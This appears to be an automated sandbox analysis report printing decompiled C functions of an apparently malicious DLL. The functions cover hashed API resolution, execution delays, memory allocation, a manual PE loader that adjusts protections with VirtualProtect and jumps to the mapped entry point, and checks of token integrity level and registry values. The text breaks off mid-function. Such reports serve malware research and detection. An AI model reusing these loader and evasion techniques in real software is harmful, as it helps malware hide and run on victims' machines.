                                                                                                        • String ID:
                                                                                                        • API String ID: 298373132-0
                                                                                                        • Opcode ID: dbd192c7364e75775c04c14d4722fca99b49c6ff80d8d39bb828517c8fbc3102
                                                                                                        • Instruction ID: e5ab0c719976254b15887885fbbe1cedd3522a549fec8896961ec95858081b3f
                                                                                                        • Opcode Fuzzy Hash: dbd192c7364e75775c04c14d4722fca99b49c6ff80d8d39bb828517c8fbc3102
                                                                                                        • Instruction Fuzzy Hash: 3822E47062A3419FFB60DAB4C860FDB77A9AF92308F10891FE89457294FB70D845C792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E6E482234(void* __ecx, intOrPtr __edx, void* __esi) {
                                                                                                        				intOrPtr _v4;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr* _t5;
                                                                                                        				intOrPtr _t11;
                                                                                                        				intOrPtr* _t13;
                                                                                                        				intOrPtr* _t15;
                                                                                                        
                                                                                                        				_t11 = __edx;
                                                                                                        				if(__ecx == 0) {
                                                                                                        					 *_t15 = 0;
                                                                                                        					_v4 = 0;
                                                                                                        				} else {
                                                                                                        					 *_t15 = E6E483AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
                                                                                                        					_v20 = _t11;
                                                                                                        				}
                                                                                                        				_t5 = E6E48306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
                                                                                                        				_t13 = _t5;
                                                                                                        				if(_t13 != 0) {
                                                                                                        					_t5 =  *_t13(0, _t15); // executed
                                                                                                        				}
                                                                                                        				return _t5;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E474B17,00000000,00000000,?), ref: 6E482278
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DelayExecution
                                                                                                        • String ID:
                                                                                                        • API String ID: 1249177460-0
                                                                                                        • Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                        • Instruction ID: 4a8da1d1adec18221179668d7084648316f006394b0389d2a95f16b2c8ae1a75
                                                                                                        • Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                        • Instruction Fuzzy Hash: AEE065B010E302ADE7889A789C04F6B36D8AF85710F20892EB468D7284FA70D4018365
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E482820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
                                                                                                        				long _v4;
                                                                                                        				void* _t8;
                                                                                                        				long _t10;
                                                                                                        				PVOID* _t19;
                                                                                                        
                                                                                                        				_v4 = __edx;
                                                                                                        				 *_t19 = __ecx;
                                                                                                        				if(E6E48306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
                                                                                                        					L3:
                                                                                                        					_t8 =  *_t19;
                                                                                                        				} else {
                                                                                                        					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
                                                                                                        					if(_t10 == 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						_t8 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t8;
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(6E4888E6,?,00000000,000000FF,6E4888E6,6E4888E6,60A28C5C,60A28C5C,?,?,6E4888E6,00003000,00000004,000000FF), ref: 6E482857
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                        • Instruction ID: c953e542e53e42bf41fe286511827beef94f7be868a0f6df84479d812ac2dada
                                                                                                        • Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                        • Instruction Fuzzy Hash: 89E03071609342AFEB08CAA5CC14E6BB7E9EF84604F108D2EB494D6250DB70D9009725
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E6E483138(intOrPtr* __ecx) {
                                                                                                        				void* _t1;
                                                                                                        
                                                                                                        				_push(E6E4834B0);
                                                                                                        				_push(1); // executed
                                                                                                        				_t1 =  *__ecx(); // executed
                                                                                                        				return _t1;
                                                                                                        			}




                                                                                                        0x6e483138
                                                                                                        0x6e48313d
                                                                                                        0x6e48313f
                                                                                                        0x6e483141

                                                                                                        APIs
                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,6E4834B0,6E483128,60A28C5C,60A28C5C,?,6E476C99,00000000), ref: 6E48313F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionHandlerVectored
                                                                                                        • String ID:
                                                                                                        • API String ID: 3310709589-0
                                                                                                        • Opcode ID: 5b3b92aa466289330c3101eabf19d5531a2f8f88c2211280c1d367237a5e8d9d
                                                                                                        • Instruction ID: 0a97d0bb33b3d4215c0aee90b7faae5f73c22fd0a0ba1184529ba16a9b529ea9
                                                                                                        • Opcode Fuzzy Hash: 5b3b92aa466289330c3101eabf19d5531a2f8f88c2211280c1d367237a5e8d9d
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 42%
                                                                                                        			E011811ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				char _v40;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr* _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v60;
                                                                                                        				intOrPtr _v64;
                                                                                                        				void* _v68;
                                                                                                        				char* _v72;
                                                                                                        				int _v76;
                                                                                                        				long _v80;
                                                                                                        				long _v84;
                                                                                                        				DWORD* _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				int _v96;
                                                                                                        				intOrPtr* _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				void* _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				char* _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				intOrPtr _v156;
                                                                                                        				signed int _v160;
                                                                                                        				signed int _v164;
                                                                                                        				intOrPtr _v168;
                                                                                                        				int _v172;
                                                                                                        				char* _v176;
                                                                                                        				intOrPtr _v180;
                                                                                                        				intOrPtr _v184;
                                                                                                        				char _v188;
                                                                                                        				intOrPtr* _t137;
                                                                                                        				int _t143;
                                                                                                        				int _t151;
                                                                                                        				int _t155;
                                                                                                        				int _t182;
                                                                                                        				unsigned int _t199;
                                                                                                        				intOrPtr _t221;
                                                                                                        				intOrPtr _t223;
                                                                                                        				void* _t231;
                                                                                                        				intOrPtr _t234;
                                                                                                        				void* _t241;
                                                                                                        				intOrPtr _t245;
                                                                                                        				intOrPtr _t252;
                                                                                                        				DWORD* _t265;
                                                                                                        				void* _t269;
                                                                                                        				intOrPtr* _t272;
                                                                                                        				intOrPtr* _t273;
                                                                                                        
                                                                                                        				_t137 = _a4;
                                                                                                        				_v44 = 0;
                                                                                                        				_t241 =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                        				 *0x1184418 = 1;
                                                                                                        				asm("movaps xmm0, [0x1183010]");
                                                                                                        				asm("movups [0x1184428], xmm0");
                                                                                                        				_v48 = _t137;
                                                                                                        				_v52 =  *((intOrPtr*)(_t137 + 0x20));
                                                                                                        				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
                                                                                                        				_v188 = _t241;
                                                                                                        				_v184 =  *((intOrPtr*)(_t137 + 0x18));
                                                                                                        				_v180 = 4;
                                                                                                        				_v176 =  &_v44;
                                                                                                        				_v60 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                        				_v64 = 4;
                                                                                                        				_v68 = _t241;
                                                                                                        				_v72 =  &_v44;
                                                                                                        				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
                                                                                                        				_v76 = _t143;
                                                                                                        				_v188 = _v68;
                                                                                                        				_v184 = 0;
                                                                                                        				_v180 =  *((intOrPtr*)(_v48 + 0x18));
                                                                                                        				_v80 = 0x400;
                                                                                                        				_v84 = 2;
                                                                                                        				_v88 =  &_v44;
                                                                                                        				_v92 = 0;
                                                                                                        				E01182798();
                                                                                                        				E011817A5(_v68,  *_v48, _v52);
                                                                                                        				E01182798( *_v48, 0, _v52);
                                                                                                        				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                        				_t272 = _t269 - 0x8c;
                                                                                                        				_t231 = _v68;
                                                                                                        				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
                                                                                                        				_v96 = _t151;
                                                                                                        				_v100 = _v68 + 0x3c;
                                                                                                        				_v104 = _t231;
                                                                                                        				_v108 = _t252;
                                                                                                        				if(_t252 != 0) {
                                                                                                        					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        				}
                                                                                                        				_v144 = _v104;
                                                                                                        				if(_v60 != 0) {
                                                                                                        					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                        					_v152 = 0;
                                                                                                        					while(1) {
                                                                                                        						_t221 = _v148;
                                                                                                        						_t199 =  *(_t221 + 0x24);
                                                                                                        						_v156 = _v152;
                                                                                                        						_v160 = _t199 >> 0x0000001e & 0x00000001;
                                                                                                        						_v164 = _t199 >> 0x1f;
                                                                                                        						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
                                                                                                        						_v184 =  *((intOrPtr*)(_t221 + 8));
                                                                                                        						_v180 =  *((intOrPtr*)(0x1184418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
                                                                                                        						_v176 =  &_v44;
                                                                                                        						_v168 = _t221;
                                                                                                        						_t182 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                        						_t272 = _t272 - 0x10;
                                                                                                        						_t223 = _v156 + 1;
                                                                                                        						_v172 = _t182;
                                                                                                        						_v148 = _v168 + 0x28;
                                                                                                        						_v152 = _t223;
                                                                                                        						if(_t223 == _v60) {
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L5:
                                                                                                        				 *_t272 = _v68;
                                                                                                        				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
                                                                                                        				_t155 = DisableThreadLibraryCalls(??);
                                                                                                        				_t273 = _t272 - 4;
                                                                                                        				_t234 =  *_v100;
                                                                                                        				_v140 = _t155;
                                                                                                        				_v136 = _t234;
                                                                                                        				_v112 = _v68;
                                                                                                        				if(_t234 == 0) {
                                                                                                        					L2:
                                                                                                        					_t245 = _v48;
                                                                                                        					_v40 =  *((intOrPtr*)(_t245 + 0x34));
                                                                                                        					_v36 =  *((intOrPtr*)(_t245 + 8));
                                                                                                        					_v32 =  *((intOrPtr*)(_t245 + 0x30));
                                                                                                        					_v28 =  *((intOrPtr*)(_t245 + 0x28));
                                                                                                        					_v24 =  *((intOrPtr*)(_t245 + 0x50));
                                                                                                        					_v20 = _v116;
                                                                                                        					 *_t273 = _t245;
                                                                                                        					_v188 = 0;
                                                                                                        					_v184 = 0x74;
                                                                                                        					_v120 =  &_v40;
                                                                                                        					_v124 = 0;
                                                                                                        					_v128 = 0x74;
                                                                                                        					_v132 =  *((intOrPtr*)(_v112 + 0x28));
                                                                                                        					E01182798();
                                                                                                        					if(_v132 != 0) {
                                                                                                        						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
                                                                                                        						goto __eax;
                                                                                                        					}
                                                                                                        					return 1;
                                                                                                        				} else {
                                                                                                        					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        					goto L2;
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x011814da
                                                                                                        0x011814e1
                                                                                                        0x011814e7
                                                                                                        0x011814e9
                                                                                                        0x011814f2
                                                                                                        0x01181503
                                                                                                        0x01181509
                                                                                                        0x0118150f
                                                                                                        0x01181515
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0118151b
                                                                                                        0x0118146c
                                                                                                        0x011813b8
                                                                                                        0x011813c6
                                                                                                        0x011813ce
                                                                                                        0x011813d1
                                                                                                        0x011813d3
                                                                                                        0x011813d9
                                                                                                        0x011813e5
                                                                                                        0x011813eb
                                                                                                        0x011813f1
                                                                                                        0x011813f4
                                                                                                        0x0118132c
                                                                                                        0x0118133c
                                                                                                        0x01181342
                                                                                                        0x01181348
                                                                                                        0x0118134e
                                                                                                        0x01181354
                                                                                                        0x0118135a
                                                                                                        0x01181360
                                                                                                        0x01181363
                                                                                                        0x01181366
                                                                                                        0x0118136e
                                                                                                        0x01181376
                                                                                                        0x01181379
                                                                                                        0x0118137c
                                                                                                        0x0118137f
                                                                                                        0x01181382
                                                                                                        0x0118138d
                                                                                                        0x01181429
                                                                                                        0x0118142f
                                                                                                        0x0118142f
                                                                                                        0x01181466
                                                                                                        0x011813fa
                                                                                                        0x011813b0
                                                                                                        0x00000000
                                                                                                        0x011813b0

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: 4bcca977b5782d8f3a42921272744f939592dfb0768d80e83b366562464b0f4e
                                                                                                        • Instruction ID: 3088112386d4651506a1a79a928957f2319f3ec6f3cd9997cd557b4ab60d726a
                                                                                                        • Opcode Fuzzy Hash: 4bcca977b5782d8f3a42921272744f939592dfb0768d80e83b366562464b0f4e
                                                                                                        • Instruction Fuzzy Hash: 73B1BDB5E04219DFDB18DF58C880A9DFBF1BF88314F1585AAD948AB351D330A982CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E485E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
                                                                                                        				long _v12;
                                                                                                        				void* __esi;
                                                                                                        				long _t9;
                                                                                                        				long _t10;
                                                                                                        				int _t12;
                                                                                                        				void* _t18;
                                                                                                        				void** _t19;
                                                                                                        				DWORD* _t20;
                                                                                                        
                                                                                                        				_t18 = __ecx;
                                                                                                        				_t19 = __ecx + 0xc;
                                                                                                        				if(E6E47C280(_t19) == 0) {
                                                                                                        					_t2 =  &_a8; // 0x6e485d79
                                                                                                        					_v12 =  *_t2;
                                                                                                        					if(E6E483064(0x8e844d1e, 0xed3ed1cc) == 0) {
                                                                                                        						_t9 = 0x7f;
                                                                                                        					} else {
                                                                                                        						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
                                                                                                        						if(_t12 == 0) {
                                                                                                        							_t9 = E6E4835F0(_t18);
                                                                                                        						} else {
                                                                                                        							_t9 = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *((intOrPtr*)(_t18 + 8)) = _t9;
                                                                                                        					if(_t9 == 0) {
                                                                                                        						_t10 = _v12;
                                                                                                        					} else {
                                                                                                        						_t10 = 0;
                                                                                                        						_v12 = 0;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t10 = 0;
                                                                                                        				}
                                                                                                        				return _t10;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E485D79,00000000,?,00000000,?), ref: 6E485EC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID: y]Hn
                                                                                                        • API String ID: 2738559852-3250390203
                                                                                                        • Opcode ID: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                        • Instruction ID: 7f1acbfe8ac494a32061fd34988c9abd59c802d1e72cdb2aad776fa08ddff95b
                                                                                                        • Opcode Fuzzy Hash: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                        • Instruction Fuzzy Hash: 2AF0D130618307AEDB91EFB98C00EBB77D8EF49240F124D2BA896C6240EB36E405C661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E6E4810A4(void* __ecx) {
                                                                                                        				long _v12;
                                                                                                        				void* _v20;
                                                                                                        				void* _v24;
                                                                                                        				long _v32;
                                                                                                        				void* _v40;
                                                                                                        				void* _v44;
                                                                                                        				char _v48;
                                                                                                        				char _v52;
                                                                                                        				void* _v56;
                                                                                                        				void* _v64;
                                                                                                        				void* _v88;
                                                                                                        				void* _v92;
                                                                                                        				int _t33;
                                                                                                        				signed char* _t35;
                                                                                                        				intOrPtr* _t40;
                                                                                                        				intOrPtr _t41;
                                                                                                        				long* _t50;
                                                                                                        				intOrPtr* _t59;
                                                                                                        				intOrPtr* _t65;
                                                                                                        				void* _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t69;
                                                                                                        				signed char* _t70;
                                                                                                        				void* _t72;
                                                                                                        				long* _t74;
                                                                                                        
                                                                                                        				_t74 =  &_v32;
                                                                                                        				_t69 = __ecx;
                                                                                                        				_v12 = 0;
                                                                                                        				_t59 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                        				if(_t59 != 0) {
                                                                                                        					 *_t59(_t69, 8,  &_v12);
                                                                                                        				}
                                                                                                        				_t50 = _t74;
                                                                                                        				 *_t50 = _v12;
                                                                                                        				_t50[1] = 1;
                                                                                                        				if(E6E47C280(_t50) != 0) {
                                                                                                        					L6:
                                                                                                        					if(_t74[1] != 0) {
                                                                                                        						E6E47BB44(_t74);
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t74[6] = 0;
                                                                                                        					if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
                                                                                                        						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
                                                                                                        					}
                                                                                                        					_t26 = _t74[6];
                                                                                                        					if(_t74[6] != 0) {
                                                                                                        						E6E47F584( &_v32, _t26);
                                                                                                        						_t68 = E6E47F4BC( &(_t74[3]), 0);
                                                                                                        						if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
                                                                                                        							L32:
                                                                                                        							E6E47F654( &_v32);
                                                                                                        							goto L6;
                                                                                                        						}
                                                                                                        						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
                                                                                                        						if(_t33 == 0) {
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_t35 = E6E48306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
                                                                                                        						if(_t35 == 0) {
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_push( *_t68);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        						_t70 = _t35;
                                                                                                        						if(_t70 == 0) {
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_t65 = E6E48306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
                                                                                                        						if(_t65 == 0) {
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
                                                                                                        						if(_t40 == 0) {
                                                                                                        							goto L32;
                                                                                                        						}
                                                                                                        						_t41 =  *_t40;
                                                                                                        						if(_t41 == 0) {
                                                                                                        							_t72 = 1;
                                                                                                        						} else {
                                                                                                        							if(_t41 == 0x1000) {
                                                                                                        								_t72 = 2;
                                                                                                        							} else {
                                                                                                        								if(_t41 == 0x2100) {
                                                                                                        									_t72 = 4;
                                                                                                        								} else {
                                                                                                        									if(_t41 == 0x2000) {
                                                                                                        										_t72 = 3;
                                                                                                        									} else {
                                                                                                        										if(_t41 == 0x3000) {
                                                                                                        											_t72 = 5;
                                                                                                        										} else {
                                                                                                        											if(_t41 == 0x4000) {
                                                                                                        												_t72 = 6;
                                                                                                        											} else {
                                                                                                        												_t66 = 7;
                                                                                                        												_t72 =  ==  ? _t66 : 0;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						E6E47F654( &_v48);
                                                                                                        						if(_v52 != 0) {
                                                                                                        							E6E47BB44(_t74);
                                                                                                        						}
                                                                                                        						return _t72;
                                                                                                        					}
                                                                                                        					goto L6;
                                                                                                        				}
                                                                                                        			}




























                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E481118
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E48117B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken
                                                                                                        • String ID:
                                                                                                        • API String ID: 4114910276-0
                                                                                                        • Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                        • Instruction ID: 4de01b9c319052e8ff57d3dc05ed213ec48b45866d86458a51aed4c46ae1088c
                                                                                                        • Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                        • Instruction Fuzzy Hash: 9F41F6702482426AEB59D5FC9C20FEFB7DD9B86300F10882FE570EA394DB64D84AC791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E6E4857B4(void* __ecx, char* _a4, intOrPtr _a8) {
                                                                                                        				int _v16;
                                                                                                        				int _v20;
                                                                                                        				intOrPtr _t11;
                                                                                                        				int* _t12;
                                                                                                        				int _t13;
                                                                                                        				void* _t23;
                                                                                                        				char* _t35;
                                                                                                        				int* _t38;
                                                                                                        
                                                                                                        				_push(_t34);
                                                                                                        				_t23 = __ecx;
                                                                                                        				_t11 =  *((intOrPtr*)(__ecx + 4));
                                                                                                        				if(_t11 == 0 || _t11 == 0xffffffff) {
                                                                                                        					_t12 = 1;
                                                                                                        				} else {
                                                                                                        					_t12 = 0;
                                                                                                        				}
                                                                                                        				if(_t12 != 0) {
                                                                                                        					L10:
                                                                                                        					_t13 = 0;
                                                                                                        				} else {
                                                                                                        					_t35 = _a4;
                                                                                                        					if(_t35 == 0 ||  *_t35 != 0) {
                                                                                                        						_v20 = 0;
                                                                                                        						_v16 = 0;
                                                                                                        						if(E6E483064(0x150c05fc, 0x545b7fe2) != 0) {
                                                                                                        							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
                                                                                                        						}
                                                                                                        						_t15 = _v16;
                                                                                                        						if(_v16 != 0) {
                                                                                                        							E6E47F828(_a8, _t15);
                                                                                                        							if(E6E483064(0x150c05fc, 0x545b7fe2) != 0) {
                                                                                                        								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E47F4BC(_a8, 0),  &_v20); // executed
                                                                                                        							}
                                                                                                        							_t13 = _v20;
                                                                                                        						} else {
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return _t13;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • RegQueryValueExA.KERNELBASE(?,6E48D1F8,00000000,?,00000000,00000000,?,?,?,6E48D1F8,?,6E485887,?,00000000,00000000), ref: 6E48580B
                                                                                                        • RegQueryValueExA.KERNELBASE(?,6E48D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E48D1F8,?,6E485887,?,00000000), ref: 6E485856
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3660427363-0
                                                                                                        • Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                        • Instruction ID: 446b2a760cef17f97694e805e8c8a44b98025d84de453e9bd46b813738060236
                                                                                                        • Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                        • Instruction Fuzzy Hash: DD11A230609305ABD6109AB59C90EABBBECEF46754F00881FF49597245EB25E800CBB1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E6E485B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
                                                                                                        				char _v24;
                                                                                                        				void* __esi;
                                                                                                        				void* _t16;
                                                                                                        				void* _t30;
                                                                                                        				long _t37;
                                                                                                        				void* _t38;
                                                                                                        				long _t39;
                                                                                                        				WCHAR** _t40;
                                                                                                        				intOrPtr* _t55;
                                                                                                        				WCHAR** _t56;
                                                                                                        				char* _t59;
                                                                                                        				long _t60;
                                                                                                        
                                                                                                        				_t56 = __ecx;
                                                                                                        				_t37 = _a8;
                                                                                                        				if(E6E47D1CC(__ecx, 0x2f) != 0) {
                                                                                                        					_t58 = _t60;
                                                                                                        					E6E47D6D0(__ecx, _t60);
                                                                                                        					E6E47CFF8(_t56,  *_t60);
                                                                                                        					E6E47CFDC(_t60);
                                                                                                        				}
                                                                                                        				if(_t37 == 0) {
                                                                                                        					_t64 = _a4 - 1;
                                                                                                        					if(_a4 != 1) {
